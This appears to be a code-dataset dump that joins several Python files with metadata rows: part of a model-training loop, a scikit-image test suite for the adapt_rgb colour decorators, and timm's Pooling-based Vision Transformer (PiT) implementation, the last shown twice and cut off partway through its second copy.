            if args.minimize_score and avg_val_score < best_score or \
                    not args.minimize_score and avg_val_score > best_score:
                best_score, best_epoch = avg_val_score, epoch
                save_checkpoint(os.path.join(save_dir, 'model.pt'), model, scaler, drug_scaler, cmpd_scaler, args)
        # ---- Evaluate this member's best checkpoint on the test set ----
        info(f'Model {model_idx} best validation {args.metric} = {best_score:.6f} on epoch {best_epoch}')
        model = load_checkpoint(os.path.join(save_dir, 'model.pt'), cuda=args.cuda, logger=logger)
        test_preds = predict(
            model=model,
            data=test_data,
            batch_size=args.batch_size,
            scaler=scaler
        )
        if args.save_preds:
            val_preds = predict(model=model, data=val_data, batch_size=args.batch_size, scaler=scaler)
            train_preds = predict(model=model, data=train_data, batch_size=args.batch_size, scaler=scaler)
            save_predictions(save_dir, train_data, val_data, test_data, \
                             train_preds, val_preds, test_preds, args.task_names, scaler)
        test_scores = evaluate_predictions(
            preds=test_preds,
            targets=test_targets,
            num_tasks=args.num_tasks,
            metric_func=metric_func,
            dataset_type=args.dataset_type,
            logger=logger
        )
        if len(test_preds) != 0:
            sum_test_preds += np.array(test_preds)
        avg_test_score = np.nanmean(test_scores)
        info(f'Model {model_idx} test {args.metric} = {avg_test_score:.6f}')
        writer.add_scalar(f'test_{args.metric}', avg_test_score, 0)
        if args.show_individual_scores:
            for task_name, test_score in zip(args.task_names, test_scores):
                info(f'Model {model_idx} test {task_name} {args.metric} = {test_score:.6f}')
                writer.add_scalar(f'test_{task_name}_{args.metric}', test_score, n_iter)
    # ---- Ensemble: average member predictions and score them ----
    avg_test_preds = (sum_test_preds / args.ensemble_size).tolist()
    ensemble_scores = evaluate_predictions(
        preds=avg_test_preds,
        targets=test_targets,
        num_tasks=args.num_tasks,
        metric_func=metric_func,
        dataset_type=args.dataset_type,
        logger=logger
    )
    avg_ensemble_test_score = np.nanmean(ensemble_scores)
    info(f'Ensemble test {args.metric} = {avg_ensemble_test_score:.6f}')
    writer.add_scalar(f'ensemble_test_{args.metric}', avg_ensemble_test_score, 0)
    if args.show_individual_scores:
        for task_name, ensemble_score in zip(args.task_names, ensemble_scores):
            info(f'Ensemble test {task_name} {args.metric} = {ensemble_score:.6f}')
    return ensemble_scores
| true | true |
f7102ed9e03cc66c9c81ee370ec0eb1a82b28ef4 | 2,753 | py | Python | ProgettoLube/WebInspector/venv/Lib/site-packages/skimage/color/tests/test_adapt_rgb.py | Lube-Project/ProgettoLube | cbf33971e2c2e865783ec1a2302625539186a338 | [
"MIT"
] | 2 | 2022-03-19T09:45:18.000Z | 2022-03-19T15:26:24.000Z | ProgettoLube/WebInspector/venv/Lib/site-packages/skimage/color/tests/test_adapt_rgb.py | Lube-Project/ProgettoLube | cbf33971e2c2e865783ec1a2302625539186a338 | [
"MIT"
] | 7 | 2021-06-08T21:46:24.000Z | 2022-03-12T00:35:31.000Z | site-packages/skimage/color/tests/test_adapt_rgb.py | Wristlebane/Pyto | 901ac307b68486d8289105c159ca702318bea5b0 | [
"MIT"
] | 1 | 2020-06-29T15:18:22.000Z | 2020-06-29T15:18:22.000Z | from functools import partial
import numpy as np
from skimage import img_as_float, img_as_uint
from skimage import color, data, filters
from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
# Down-sample image for quicker testing.
COLOR_IMAGE = data.astronaut()[::5, ::6]
GRAY_IMAGE = data.camera()[::5, ::5]
# Gaussian blur with a fixed sigma, reused by the filter-argument tests.
SIGMA = 3
smooth = partial(filters.gaussian, sigma=SIGMA)
# Comparisons use an absolute tolerance to absorb float round-off.
assert_allclose = partial(np.testing.assert_allclose, atol=1e-8)
@adapt_rgb(each_channel)
def edges_each(image):
    """Sobel filter applied to each RGB channel independently."""
    return filters.sobel(image)
@adapt_rgb(each_channel)
def smooth_each(image, sigma):
    """Gaussian blur with the given sigma, applied per RGB channel."""
    return filters.gaussian(image, sigma)
@adapt_rgb(each_channel)
def mask_each(image, mask):
    """Return a copy of *image* with the masked pixels set to zero."""
    masked = image.copy()
    masked[mask] = 0
    return masked
@adapt_rgb(hsv_value)
def edges_hsv(image):
    """Sobel filter applied to the HSV value channel only."""
    return filters.sobel(image)
@adapt_rgb(hsv_value)
def smooth_hsv(image, sigma):
    """Gaussian blur applied to the HSV value channel only."""
    return filters.gaussian(image, sigma)
@adapt_rgb(hsv_value)
def edges_hsv_uint(image):
    """Sobel filter on the HSV value channel, converted to uint via img_as_uint."""
    return img_as_uint(filters.sobel(image))
def test_gray_scale_image():
    """A gray-scale input must pass through unchanged by the adapter."""
    # We don't need to test both `hsv_value` and `each_channel` since
    # `adapt_rgb` is handling gray-scale inputs.
    assert_allclose(edges_each(GRAY_IMAGE), filters.sobel(GRAY_IMAGE))
def test_each_channel():
    """Per-channel filtering must match filtering each channel separately."""
    filtered = edges_each(COLOR_IMAGE)
    for chan_idx, chan in enumerate(np.rollaxis(filtered, axis=-1)):
        reference = img_as_float(filters.sobel(COLOR_IMAGE[:, :, chan_idx]))
        assert_allclose(chan, reference)
def test_each_channel_with_filter_argument():
    """Extra filter arguments (sigma) must be forwarded to every channel."""
    blurred = smooth_each(COLOR_IMAGE, SIGMA)
    for chan_idx, chan in enumerate(np.rollaxis(blurred, axis=-1)):
        assert_allclose(chan, smooth(COLOR_IMAGE[:, :, chan_idx]))
def test_each_channel_with_asymmetric_kernel():
    """Smoke test: per-channel filtering accepts a non-symmetric boolean mask."""
    mask = np.triu(np.ones(COLOR_IMAGE.shape[:2], dtype=np.bool_))
    mask_each(COLOR_IMAGE, mask)
def test_hsv_value():
    """hsv_value adaptation must equal filtering the V channel directly."""
    expected = filters.sobel(color.rgb2hsv(COLOR_IMAGE)[:, :, 2])
    filtered = edges_hsv(COLOR_IMAGE)
    assert_allclose(color.rgb2hsv(filtered)[:, :, 2], expected)
def test_hsv_value_with_filter_argument():
    """Filter arguments must be forwarded when adapting via hsv_value."""
    expected = smooth(color.rgb2hsv(COLOR_IMAGE)[:, :, 2])
    blurred = smooth_hsv(COLOR_IMAGE, SIGMA)
    assert_allclose(color.rgb2hsv(blurred)[:, :, 2], expected)
def test_hsv_value_with_non_float_output():
    """Non-float filter output must be merged back into the HSV image safely."""
    # Since `rgb2hsv` returns a float image and the result of the filtered
    # result is inserted into the HSV image, we want to make sure there isn't
    # a dtype mismatch.
    filtered = edges_hsv_uint(COLOR_IMAGE)
    filtered_value = color.rgb2hsv(filtered)[:, :, 2]
    value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
    # Reduce tolerance because dtype conversion.
    assert_allclose(filtered_value, filters.sobel(value), rtol=1e-5, atol=1e-5)
| 28.978947 | 79 | 0.730839 | from functools import partial
import numpy as np
from skimage import img_as_float, img_as_uint
from skimage import color, data, filters
from skimage.color.adapt_rgb import adapt_rgb, each_channel, hsv_value
COLOR_IMAGE = data.astronaut()[::5, ::6]
GRAY_IMAGE = data.camera()[::5, ::5]
SIGMA = 3
smooth = partial(filters.gaussian, sigma=SIGMA)
assert_allclose = partial(np.testing.assert_allclose, atol=1e-8)
@adapt_rgb(each_channel)
def edges_each(image):
return filters.sobel(image)
@adapt_rgb(each_channel)
def smooth_each(image, sigma):
return filters.gaussian(image, sigma)
@adapt_rgb(each_channel)
def mask_each(image, mask):
result = image.copy()
result[mask] = 0
return result
@adapt_rgb(hsv_value)
def edges_hsv(image):
return filters.sobel(image)
@adapt_rgb(hsv_value)
def smooth_hsv(image, sigma):
return filters.gaussian(image, sigma)
@adapt_rgb(hsv_value)
def edges_hsv_uint(image):
return img_as_uint(filters.sobel(image))
def test_gray_scale_image():
# `adapt_rgb` is handling gray-scale inputs.
assert_allclose(edges_each(GRAY_IMAGE), filters.sobel(GRAY_IMAGE))
def test_each_channel():
filtered = edges_each(COLOR_IMAGE)
for i, channel in enumerate(np.rollaxis(filtered, axis=-1)):
expected = img_as_float(filters.sobel(COLOR_IMAGE[:, :, i]))
assert_allclose(channel, expected)
def test_each_channel_with_filter_argument():
filtered = smooth_each(COLOR_IMAGE, SIGMA)
for i, channel in enumerate(np.rollaxis(filtered, axis=-1)):
assert_allclose(channel, smooth(COLOR_IMAGE[:, :, i]))
def test_each_channel_with_asymmetric_kernel():
mask = np.triu(np.ones(COLOR_IMAGE.shape[:2], dtype=np.bool_))
mask_each(COLOR_IMAGE, mask)
def test_hsv_value():
filtered = edges_hsv(COLOR_IMAGE)
value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
assert_allclose(color.rgb2hsv(filtered)[:, :, 2], filters.sobel(value))
def test_hsv_value_with_filter_argument():
filtered = smooth_hsv(COLOR_IMAGE, SIGMA)
value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
assert_allclose(color.rgb2hsv(filtered)[:, :, 2], smooth(value))
def test_hsv_value_with_non_float_output():
# Since `rgb2hsv` returns a float image and the result of the filtered
# result is inserted into the HSV image, we want to make sure there isn't
filtered = edges_hsv_uint(COLOR_IMAGE)
filtered_value = color.rgb2hsv(filtered)[:, :, 2]
value = color.rgb2hsv(COLOR_IMAGE)[:, :, 2]
assert_allclose(filtered_value, filters.sobel(value), rtol=1e-5, atol=1e-5)
| true | true |
f71030712e51257e43c9ff71be37bc814684e32c | 12,983 | py | Python | timm/models/pit.py | Animatory/pytorch-image-models | 3ace100fcfdab3619dc71307613c42e53fb70221 | [
"Apache-2.0"
] | null | null | null | timm/models/pit.py | Animatory/pytorch-image-models | 3ace100fcfdab3619dc71307613c42e53fb70221 | [
"Apache-2.0"
] | null | null | null | timm/models/pit.py | Animatory/pytorch-image-models | 3ace100fcfdab3619dc71307613c42e53fb70221 | [
"Apache-2.0"
] | null | null | null | """ Pooling-based Vision Transformer (PiT) in PyTorch
A PyTorch implement of Pooling-based Vision Transformers as described in
'Rethinking Spatial Dimensions of Vision Transformers' - https://arxiv.org/abs/2103.16302
This code was adapted from the original version at https://github.com/naver-ai/pit, original copyright below.
Modifications for timm by / Copyright 2020 Ross Wightman
"""
# PiT
# Copyright 2021-present NAVER Corp.
# Apache License v2.0
import math
import re
from functools import partial
from typing import Tuple
import torch
from torch import nn
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from .helpers import build_model_with_cfg
from .layers import trunc_normal_, to_2tuple
from .registry import register_model
from .vision_transformer import Block
def _cfg(url='', **kwargs):
    """Build a default pretrained-weight config dict; kwargs override defaults."""
    cfg = {
        'url': url,
        'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None,
        'crop_pct': .9, 'interpolation': 'bicubic', 'fixed_input_size': True,
        'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,
        'first_conv': 'patch_embed.conv', 'classifier': 'head',
    }
    cfg.update(kwargs)
    return cfg
default_cfgs = {
    # PiT weights converted from the NAVER AI release (https://github.com/naver-ai/pit)
    'pit_ti_224': _cfg(
        url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_ti_730.pth'),
    'pit_xs_224': _cfg(
        url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_xs_781.pth'),
    'pit_s_224': _cfg(
        url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_s_809.pth'),
    'pit_b_224': _cfg(
        url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_b_820.pth'),
    # Distilled variants expose both a classification and a distillation head.
    'pit_ti_distilled_224': _cfg(
        url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_ti_distill_746.pth',
        classifier=('head', 'head_dist')),
    'pit_xs_distilled_224': _cfg(
        url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_xs_distill_791.pth',
        classifier=('head', 'head_dist')),
    'pit_s_distilled_224': _cfg(
        url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_s_distill_819.pth',
        classifier=('head', 'head_dist')),
    'pit_b_distilled_224': _cfg(
        url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_b_distill_840.pth',
        classifier=('head', 'head_dist')),
}
class SequentialTuple(nn.Sequential):
    """nn.Sequential variant whose forward threads a (tensor, tensor) tuple
    through each child module (works around torchscript list typing issues).
    """
    def __init__(self, *args):
        super(SequentialTuple, self).__init__(*args)

    def forward(self, x: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        out = x
        for stage in self:
            out = stage(out)
        return out
class Transformer(nn.Module):
    """One PiT stage: a stack of transformer blocks over a 2D token map.

    The (B, C, H, W) feature map is flattened to a token sequence, prepended
    with the class token(s), processed by `depth` attention blocks, restored
    to 2D, and then optionally downsampled by `pool`.
    """
    def __init__(
            self, base_dim, depth, heads, mlp_ratio, pool=None, drop_rate=.0, attn_drop_rate=.0, drop_path_prob=None):
        super(Transformer, self).__init__()
        # NOTE(review): `layers` appears unused (blocks live in `self.blocks`);
        # an empty ModuleList contributes nothing to the state dict.
        self.layers = nn.ModuleList([])
        embed_dim = base_dim * heads  # total embedding width for this stage
        self.blocks = nn.Sequential(*[
            Block(
                dim=embed_dim,
                num_heads=heads,
                mlp_ratio=mlp_ratio,
                qkv_bias=True,
                drop=drop_rate,
                attn_drop=attn_drop_rate,
                drop_path=drop_path_prob[i],  # per-block stochastic depth rate
                norm_layer=partial(nn.LayerNorm, eps=1e-6)
            )
            for i in range(depth)])
        self.pool = pool

    def forward(self, x: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
        x, cls_tokens = x
        B, C, H, W = x.shape
        token_length = cls_tokens.shape[1]
        # (B, C, H, W) -> (B, H*W, C) token sequence with class tokens first.
        x = x.flatten(2).transpose(1, 2)
        x = torch.cat((cls_tokens, x), dim=1)
        x = self.blocks(x)
        # Split the class tokens back off and restore the 2D map.
        cls_tokens = x[:, :token_length]
        x = x[:, token_length:]
        x = x.transpose(1, 2).reshape(B, C, H, W)
        if self.pool is not None:
            x, cls_tokens = self.pool(x, cls_tokens)
        return x, cls_tokens
class ConvHeadPooling(nn.Module):
    """Downsample the spatial token map with a grouped strided conv while
    projecting the class token(s) to the new width with a linear layer."""

    def __init__(self, in_feature, out_feature, stride, padding_mode='zeros'):
        super(ConvHeadPooling, self).__init__()
        # kernel = stride + 1 with padding = stride // 2 halves (for stride=2)
        # the spatial size; groups=in_feature keeps the conv per-input-channel.
        self.conv = nn.Conv2d(
            in_feature, out_feature, kernel_size=stride + 1, stride=stride,
            padding=stride // 2, padding_mode=padding_mode, groups=in_feature)
        self.fc = nn.Linear(in_feature, out_feature)

    def forward(self, x, cls_token) -> Tuple[torch.Tensor, torch.Tensor]:
        return self.conv(x), self.fc(cls_token)
class ConvEmbedding(nn.Module):
    """Patch embedding implemented as a single strided convolution."""

    def __init__(self, in_channels, out_channels, patch_size, stride, padding):
        super(ConvEmbedding, self).__init__()
        self.conv = nn.Conv2d(
            in_channels, out_channels, kernel_size=patch_size,
            stride=stride, padding=padding, bias=True)

    def forward(self, x):
        return self.conv(x)
class PoolingVisionTransformer(nn.Module):
    """ Pooling-based Vision Transformer

    A PyTorch implementation of 'Rethinking Spatial Dimensions of Vision Transformers'
        - https://arxiv.org/abs/2103.16302

    Tokens are kept as a 2D (B, C, H, W) map between stages so that spatial
    pooling (ConvHeadPooling) can shrink the sequence while widening channels.
    """
    def __init__(self, img_size, patch_size, stride, base_dims, depth, heads,
                 mlp_ratio, num_classes=1000, in_chans=3, distilled=False,
                 attn_drop_rate=.0, drop_rate=.0, drop_path_rate=.0):
        super(PoolingVisionTransformer, self).__init__()
        padding = 0
        img_size = to_2tuple(img_size)
        patch_size = to_2tuple(patch_size)
        # Spatial extent of the token map produced by the conv patch embedding.
        height = math.floor((img_size[0] + 2 * padding - patch_size[0]) / stride + 1)
        width = math.floor((img_size[1] + 2 * padding - patch_size[1]) / stride + 1)
        self.base_dims = base_dims
        self.heads = heads
        self.num_classes = num_classes
        # 2 tokens (cls + distillation) when distilled, else just cls.
        self.num_tokens = 2 if distilled else 1
        self.patch_size = patch_size
        self.pos_embed = nn.Parameter(torch.randn(1, base_dims[0] * heads[0], height, width))
        self.patch_embed = ConvEmbedding(in_chans, base_dims[0] * heads[0], patch_size, stride, padding)
        self.cls_token = nn.Parameter(torch.randn(1, self.num_tokens, base_dims[0] * heads[0]))
        self.pos_drop = nn.Dropout(p=drop_rate)
        transformers = []
        # stochastic depth decay rule: linearly increasing drop-path per block,
        # split into per-stage lists.
        dpr = [x.tolist() for x in torch.linspace(0, drop_path_rate, sum(depth)).split(depth)]
        for stage in range(len(depth)):
            pool = None
            # Every stage except the last ends with a spatial pooling layer.
            if stage < len(heads) - 1:
                pool = ConvHeadPooling(
                    base_dims[stage] * heads[stage], base_dims[stage + 1] * heads[stage + 1], stride=2)
            transformers += [Transformer(
                base_dims[stage], depth[stage], heads[stage], mlp_ratio, pool=pool,
                drop_rate=drop_rate, attn_drop_rate=attn_drop_rate, drop_path_prob=dpr[stage])
            ]
        self.transformers = SequentialTuple(*transformers)
        self.norm = nn.LayerNorm(base_dims[-1] * heads[-1], eps=1e-6)
        self.num_features = self.embed_dim = base_dims[-1] * heads[-1]
        # Classifier head (plus a distillation head when distilled)
        self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
        self.head_dist = None
        if distilled:
            self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()
        trunc_normal_(self.pos_embed, std=.02)
        trunc_normal_(self.cls_token, std=.02)
        self.apply(self._init_weights)

    def _init_weights(self, m):
        # Only LayerNorm gets explicit init here; other modules keep defaults.
        if isinstance(m, nn.LayerNorm):
            nn.init.constant_(m.bias, 0)
            nn.init.constant_(m.weight, 1.0)

    @torch.jit.ignore
    def no_weight_decay(self):
        # Parameters to exclude from weight decay (consumed by the optimizer factory).
        return {'pos_embed', 'cls_token'}

    def get_classifier(self):
        """Return the classifier head(s); a (head, head_dist) pair when distilled."""
        if self.head_dist is not None:
            return self.head, self.head_dist
        else:
            return self.head

    def reset_classifier(self, num_classes, global_pool=''):
        """Replace the classifier head(s) for a new number of classes."""
        self.num_classes = num_classes
        self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
        if self.head_dist is not None:
            self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()

    def forward_features(self, x):
        x = self.patch_embed(x)
        x = self.pos_drop(x + self.pos_embed)
        cls_tokens = self.cls_token.expand(x.shape[0], -1, -1)
        x, cls_tokens = self.transformers((x, cls_tokens))
        cls_tokens = self.norm(cls_tokens)
        # Return (cls, dist) token features when distilled, else the cls token.
        if self.head_dist is not None:
            return cls_tokens[:, 0], cls_tokens[:, 1]
        else:
            return cls_tokens[:, 0]

    def forward(self, x):
        x = self.forward_features(x)
        if self.head_dist is not None:
            x, x_dist = self.head(x[0]), self.head_dist(x[1])  # x must be a tuple
            if self.training and not torch.jit.is_scripting():
                # During training return both head outputs (for distillation loss).
                return x, x_dist
            else:
                # At inference, average the two heads.
                return (x + x_dist) / 2
        else:
            return self.head(x)
def checkpoint_filter_fn(state_dict, model):
    """Remap pretrained checkpoint keys to the current module layout.

    Keys of the form ``pools.<i>.*`` are renamed to ``transformers.<i>.pool.*``;
    all other keys pass through unchanged.
    """
    # FIXME: pos_embed resizing for PiT (different input size) is not implemented yet.
    pool_key = re.compile(r'pools\.(\d)\.')

    def _rename(key):
        # 'pools.N.' -> 'transformers.N.pool.'
        return pool_key.sub(lambda m: f'transformers.{int(m.group(1))}.pool.', key)

    return {_rename(k): v for k, v in state_dict.items()}
def _create_pit(variant, pretrained=False, **kwargs):
    """Instantiate a PiT variant, optionally loading pretrained weights.

    Raises:
        RuntimeError: PiT does not support timm's `features_only` extraction.
    """
    if kwargs.get('features_only', None):
        raise RuntimeError('features_only not implemented for Vision Transformer models.')
    model = build_model_with_cfg(
        PoolingVisionTransformer, variant, pretrained,
        default_cfg=default_cfgs[variant],
        pretrained_filter_fn=checkpoint_filter_fn,
        **kwargs)
    return model
@register_model
def pit_b_224(pretrained=False, **kwargs):
    """PiT-B @ 224x224 (patch 14, stride 7).

    Fix: `pretrained` defaults to False, per the timm entrypoint convention.
    """
    model_kwargs = dict(
        patch_size=14,
        stride=7,
        base_dims=[64, 64, 64],
        depth=[3, 6, 4],
        heads=[4, 8, 16],
        mlp_ratio=4,
        **kwargs
    )
    return _create_pit('pit_b_224', pretrained, **model_kwargs)
@register_model
def pit_s_224(pretrained=False, **kwargs):
    """PiT-S @ 224x224 (patch 16, stride 8).

    Fix: `pretrained` defaults to False, per the timm entrypoint convention.
    """
    model_kwargs = dict(
        patch_size=16,
        stride=8,
        base_dims=[48, 48, 48],
        depth=[2, 6, 4],
        heads=[3, 6, 12],
        mlp_ratio=4,
        **kwargs
    )
    return _create_pit('pit_s_224', pretrained, **model_kwargs)
@register_model
def pit_xs_224(pretrained=False, **kwargs):
    """PiT-XS @ 224x224 (patch 16, stride 8).

    Fix: `pretrained` defaults to False, per the timm entrypoint convention.
    """
    model_kwargs = dict(
        patch_size=16,
        stride=8,
        base_dims=[48, 48, 48],
        depth=[2, 6, 4],
        heads=[2, 4, 8],
        mlp_ratio=4,
        **kwargs
    )
    return _create_pit('pit_xs_224', pretrained, **model_kwargs)
@register_model
def pit_ti_224(pretrained=False, **kwargs):
    """PiT-Ti @ 224x224 (patch 16, stride 8).

    Fix: `pretrained` defaults to False, per the timm entrypoint convention.
    """
    model_kwargs = dict(
        patch_size=16,
        stride=8,
        base_dims=[32, 32, 32],
        depth=[2, 6, 4],
        heads=[2, 4, 8],
        mlp_ratio=4,
        **kwargs
    )
    return _create_pit('pit_ti_224', pretrained, **model_kwargs)
@register_model
def pit_b_distilled_224(pretrained=False, **kwargs):
    """PiT-B (distilled) @ 224x224 — adds a distillation token/head.

    Fix: `pretrained` defaults to False, per the timm entrypoint convention.
    """
    model_kwargs = dict(
        patch_size=14,
        stride=7,
        base_dims=[64, 64, 64],
        depth=[3, 6, 4],
        heads=[4, 8, 16],
        mlp_ratio=4,
        distilled=True,
        **kwargs
    )
    return _create_pit('pit_b_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_s_distilled_224(pretrained=False, **kwargs):
    """PiT-S (distilled) @ 224x224 — adds a distillation token/head.

    Fix: `pretrained` defaults to False, per the timm entrypoint convention.
    """
    model_kwargs = dict(
        patch_size=16,
        stride=8,
        base_dims=[48, 48, 48],
        depth=[2, 6, 4],
        heads=[3, 6, 12],
        mlp_ratio=4,
        distilled=True,
        **kwargs
    )
    return _create_pit('pit_s_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_xs_distilled_224(pretrained=False, **kwargs):
    """PiT-XS (distilled) @ 224x224 — adds a distillation token/head.

    Fix: `pretrained` defaults to False, per the timm entrypoint convention.
    """
    model_kwargs = dict(
        patch_size=16,
        stride=8,
        base_dims=[48, 48, 48],
        depth=[2, 6, 4],
        heads=[2, 4, 8],
        mlp_ratio=4,
        distilled=True,
        **kwargs
    )
    return _create_pit('pit_xs_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_ti_distilled_224(pretrained=False, **kwargs):
    """PiT-Ti (distilled) @ 224x224 — adds a distillation token/head.

    Fix: `pretrained` defaults to False, per the timm entrypoint convention.
    """
    model_kwargs = dict(
        patch_size=16,
        stride=8,
        base_dims=[32, 32, 32],
        depth=[2, 6, 4],
        heads=[2, 4, 8],
        mlp_ratio=4,
        distilled=True,
        **kwargs
    )
    return _create_pit('pit_ti_distilled_224', pretrained, **model_kwargs)
| 33.722078 | 122 | 0.626281 |
import math
import re
from functools import partial
from typing import Tuple
import torch
from torch import nn
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from .helpers import build_model_with_cfg
from .layers import trunc_normal_, to_2tuple
from .registry import register_model
from .vision_transformer import Block
def _cfg(url='', **kwargs):
return {
'url': url,
'num_classes': 1000, 'input_size': (3, 224, 224), 'pool_size': None,
'crop_pct': .9, 'interpolation': 'bicubic', 'fixed_input_size': True,
'mean': IMAGENET_DEFAULT_MEAN, 'std': IMAGENET_DEFAULT_STD,
'first_conv': 'patch_embed.conv', 'classifier': 'head',
**kwargs
}
default_cfgs = {
'pit_ti_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_ti_730.pth'),
'pit_xs_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_xs_781.pth'),
'pit_s_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_s_809.pth'),
'pit_b_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_b_820.pth'),
'pit_ti_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_ti_distill_746.pth',
classifier=('head', 'head_dist')),
'pit_xs_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_xs_distill_791.pth',
classifier=('head', 'head_dist')),
'pit_s_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_s_distill_819.pth',
classifier=('head', 'head_dist')),
'pit_b_distilled_224': _cfg(
url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-pit-weights/pit_b_distill_840.pth',
classifier=('head', 'head_dist')),
}
class SequentialTuple(nn.Sequential):
def __init__(self, *args):
super(SequentialTuple, self).__init__(*args)
def forward(self, x: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
for module in self:
x = module(x)
return x
class Transformer(nn.Module):
def __init__(
self, base_dim, depth, heads, mlp_ratio, pool=None, drop_rate=.0, attn_drop_rate=.0, drop_path_prob=None):
super(Transformer, self).__init__()
self.layers = nn.ModuleList([])
embed_dim = base_dim * heads
self.blocks = nn.Sequential(*[
Block(
dim=embed_dim,
num_heads=heads,
mlp_ratio=mlp_ratio,
qkv_bias=True,
drop=drop_rate,
attn_drop=attn_drop_rate,
drop_path=drop_path_prob[i],
norm_layer=partial(nn.LayerNorm, eps=1e-6)
)
for i in range(depth)])
self.pool = pool
def forward(self, x: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
x, cls_tokens = x
B, C, H, W = x.shape
token_length = cls_tokens.shape[1]
x = x.flatten(2).transpose(1, 2)
x = torch.cat((cls_tokens, x), dim=1)
x = self.blocks(x)
cls_tokens = x[:, :token_length]
x = x[:, token_length:]
x = x.transpose(1, 2).reshape(B, C, H, W)
if self.pool is not None:
x, cls_tokens = self.pool(x, cls_tokens)
return x, cls_tokens
class ConvHeadPooling(nn.Module):
def __init__(self, in_feature, out_feature, stride, padding_mode='zeros'):
super(ConvHeadPooling, self).__init__()
self.conv = nn.Conv2d(
in_feature, out_feature, kernel_size=stride + 1, padding=stride // 2, stride=stride,
padding_mode=padding_mode, groups=in_feature)
self.fc = nn.Linear(in_feature, out_feature)
def forward(self, x, cls_token) -> Tuple[torch.Tensor, torch.Tensor]:
x = self.conv(x)
cls_token = self.fc(cls_token)
return x, cls_token
class ConvEmbedding(nn.Module):
def __init__(self, in_channels, out_channels, patch_size, stride, padding):
super(ConvEmbedding, self).__init__()
self.conv = nn.Conv2d(
in_channels, out_channels, kernel_size=patch_size, stride=stride, padding=padding, bias=True)
def forward(self, x):
x = self.conv(x)
return x
class PoolingVisionTransformer(nn.Module):
def __init__(self, img_size, patch_size, stride, base_dims, depth, heads,
mlp_ratio, num_classes=1000, in_chans=3, distilled=False,
attn_drop_rate=.0, drop_rate=.0, drop_path_rate=.0):
super(PoolingVisionTransformer, self).__init__()
padding = 0
img_size = to_2tuple(img_size)
patch_size = to_2tuple(patch_size)
height = math.floor((img_size[0] + 2 * padding - patch_size[0]) / stride + 1)
width = math.floor((img_size[1] + 2 * padding - patch_size[1]) / stride + 1)
self.base_dims = base_dims
self.heads = heads
self.num_classes = num_classes
self.num_tokens = 2 if distilled else 1
self.patch_size = patch_size
self.pos_embed = nn.Parameter(torch.randn(1, base_dims[0] * heads[0], height, width))
self.patch_embed = ConvEmbedding(in_chans, base_dims[0] * heads[0], patch_size, stride, padding)
self.cls_token = nn.Parameter(torch.randn(1, self.num_tokens, base_dims[0] * heads[0]))
self.pos_drop = nn.Dropout(p=drop_rate)
transformers = []
dpr = [x.tolist() for x in torch.linspace(0, drop_path_rate, sum(depth)).split(depth)]
for stage in range(len(depth)):
pool = None
if stage < len(heads) - 1:
pool = ConvHeadPooling(
base_dims[stage] * heads[stage], base_dims[stage + 1] * heads[stage + 1], stride=2)
transformers += [Transformer(
base_dims[stage], depth[stage], heads[stage], mlp_ratio, pool=pool,
drop_rate=drop_rate, attn_drop_rate=attn_drop_rate, drop_path_prob=dpr[stage])
]
self.transformers = SequentialTuple(*transformers)
self.norm = nn.LayerNorm(base_dims[-1] * heads[-1], eps=1e-6)
self.num_features = self.embed_dim = base_dims[-1] * heads[-1]
self.head = nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()
self.head_dist = None
if distilled:
self.head_dist = nn.Linear(self.embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.pos_embed, std=.02)
trunc_normal_(self.cls_token, std=.02)
self.apply(self._init_weights)
def _init_weights(self, m):
if isinstance(m, nn.LayerNorm):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
@torch.jit.ignore
def no_weight_decay(self):
return {'pos_embed', 'cls_token'}
def get_classifier(self):
if self.head_dist is not None:
return self.head, self.head_dist
else:
return self.head
def reset_classifier(self, num_classes, global_pool=''):
